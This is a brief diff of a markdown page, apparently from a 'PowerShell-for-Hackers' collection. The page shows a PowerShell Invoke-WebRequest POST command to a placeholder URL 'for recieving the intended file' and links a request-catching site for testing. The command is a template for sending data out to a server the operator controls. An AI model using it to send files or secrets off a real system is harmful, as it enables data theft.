I-Am-Jakoby/PowerShell-for-Hackers/Functions/Invoke-WebRequest.md

 [Request Catcher](https://requestcatcher.com/)<-------Helpful website to test POST requests

 ```
-Invoke-WebRequest -Uri < Your url for recieving the intended file> -Method POST -Body "cookies are good"
+Invoke-WebRequest -Uri < Your url for recieving the intended file> -Method POST -Body "text to upload"
 ```

 <p align="right">(<a href="#top">back to top</a>)</p>